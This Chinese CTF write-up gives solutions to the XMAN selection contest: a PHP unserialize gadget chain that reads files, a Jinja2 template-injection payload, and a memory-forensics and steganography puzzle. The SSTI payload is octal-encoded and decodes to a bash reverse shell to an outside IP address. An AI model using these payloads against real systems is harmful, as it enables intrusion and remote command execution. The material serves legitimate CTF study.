第五届 XMAN 选拔赛

Web

签到

按照提示进行请求即可获得 flag。

1
2
3
4
5
6
POST /?a=1 HTTP/1.1
Host: 124.71.236.172
Content-Length: 3
Connection: close

b=2
1
flag{you_are_great!!!}

easyphp

题目给出的代码如下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
<?php
error_reporting(0);
highlight_file(__FILE__);

class XMAN{
public $class;
public $para;
public $check;
public function __construct()
{
$this->class = "Hel";
$this->para = "xctfer";
echo new $this->class ($this->para);
}
public function __wakeup()
{
$this->check = new Filter;
if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
echo new $this->class ($this->para);
}
else
die('what?Really?');
}

}
class Hel{
var $a;
public function __construct($a)
{
$this->a = $a;
echo ("Hello bro, I guess you are a lazy ".$this->a);
}
}
class Filter{

function vaild($code){
$pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
if (preg_match($pattern, $code)){
return false;
}
else
return true;
}
}


if(isset($_GET['xctf'])){
unserialize($_GET['xctf']);
}
else{
$a=new XMAN;

}

观察到有对 valid 方法的调用,因此尝试使用 FilesystemIterator 类列出目录下文件,再使用 SplFileObject 读取出 flag。构造出如下两段脚本生成载荷。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
// List directory
class XMAN{
public $class;
public $para;

public function __construct(){
$this->class = "FilesystemIterator";
$this->para = "./xxxXXXmMManNNn";
}

}
echo serialize(new XMAN());

// Read flag
class XMAN{
public $class;
public $para;

public function __construct(){
$this->class = "SplFileObject";
$this->para = "./xxxXXXmMManNNn/f1a4.php";
}

}
echo serialize(new XMAN());

将生成的载荷作为 GET 参数 xctf 提交即可获得 flag。

1
flag{928erf51ab894a64f7865cf3c2128b34}

easyssti

https://www.anquanke.com/post/id/223895#:~:text=Web-,Normal%20ssti,-ban%E4%BA%86%E5%BE%88%E5%A4%9A

跟 2020 年的安洵杯的 Normal ssti 相似,也是 Jinja2 的模板注入。不同点在于很难拿到 getitem 方法,因此可以使用 values 方法将字典转化为数组再取值。使用八进制绕过,构造出如下载荷进行反弹 shell。

text
1
name={%print((lipsum|attr("__globals__")).values()[18].values()[134]("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\160\157\160\145\156\50\47\142\141\163\150\40\55\143\40\42\142\141\163\150\40\55\151\40\76\46\40\57\144\145\166\57\164\143\160\57\70\56\61\63\66\56\70\56\62\61\60\57\63\62\65\65\40\60\76\46\61\42\47\51\56\162\145\141\144\50\51"))%}

在靶机的根目录可以找到 flag。

1
flag{zPkb3tzUW8m0KuSfPoPqgSU37I4ui2hZ}

Misc

try_all_volatility

我从孙吉儿那里偷来数据,但他是个机灵鬼,竟然把flag藏到了自拍照里

将文件解压后使用 Volatility 2 的 imageinfo 检测,可以得到如下如下信息。

text
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/mnt/f/ghrepos/volatility2/imgs/mem)
PAE type : PAE
DTB : 0x713000L
KDBG : 0x8054e2e0L
Number of Processors : 2
Image Type (Service Pack) : 3
KPCR for CPU 0 : 0xffdff000L
KPCR for CPU 1 : 0xbab40000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2021-06-18 02:13:15 UTC+0000
Image local date and time : 2021-06-18 10:13:15 +0800

确定 profile 为 WinXPSP3x86 后可以使用 filescan 扫描到桌面有两个关键文件。

text
1
2
3
Volatility Foundation Volatility Framework 2.6.1
0x0000000009aaf028 1 0 R--rwd \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\MISC\hint.txt
0x000000000a283498 1 0 R--rwd \Device\HarddiskVolume1\Documents and Settings\Administrator\桌面\MISC\res.png

将文本文档和图片提取出来,在 hint.txt 中可以得到如下提示。

text
1
youcangetsthfromcmd

使用 cmdscan 功能可以得到如下信息。

text
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Volatility Foundation Volatility Framework 2.6.1
**************************************************
CommandProcess: csrss.exe Pid: 600
CommandHistory: 0x2e3a508 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 18 LastAdded: 17 LastDisplayed: 17
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x198
Cmd #0 @ 0x55b548: cd C:\Documents and Settings\Administrator\??\MISC
Cmd #1 @ 0x2dd7a20: winpmem_v3.3.rc3.exe -dd -o memdump.raw --format --volume_format raw
Cmd #2 @ 0x55b8a8: winpmem_v3.3.rc3.exe -dd -o memdump.raw --format raw --volume_format raw
Cmd #3 @ 0x55b3f0: can you find this?
Cmd #4 @ 0x5524b8: yes
Cmd #5 @ 0x2e39400: please go on
Cmd #6 @ 0x2e39a80: haha
Cmd #7 @ 0x2e01170: flag is down
Cmd #8 @ 0x2e02110: flag{xixixixix_Llalala_leizeNiuBi}
Cmd #9 @ 0x2e02f60: winpmem_v3.3.rc3.exe -dd -o memdump.raw --format raw --volume_format raw
Cmd #10 @ 0x2e3a130: waw
Cmd #11 @ 0x2e3a1d8: jpg?????????????????????????????????????????????????
Cmd #12 @ 0x2e3dd80: ?
Cmd #13 @ 0x55b878: nonono it is png
Cmd #14 @ 0x55c778: just check the pixel!
Cmd #15 @ 0x55d1d8: !!!!!!!
Cmd #16 @ 0x2e3a028: !!!!!!
Cmd #17 @ 0x2dd7ad0: winpmem_v3.3.rc3.exe -dd -o memorydump.raw --format raw --volume_format raw
**************************************************
CommandProcess: csrss.exe Pid: 600
CommandHistory: 0x2e3ad88 Application: winpmem_v3.3.rc3.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x624

对图片使用 StegSolve 进行 B 通道下的 MSB 数据提取可以得到一个压缩包。

将其保存出来后解压可得 flag。

1
flag{Waw!_Y0u_D1d!_it_^_^}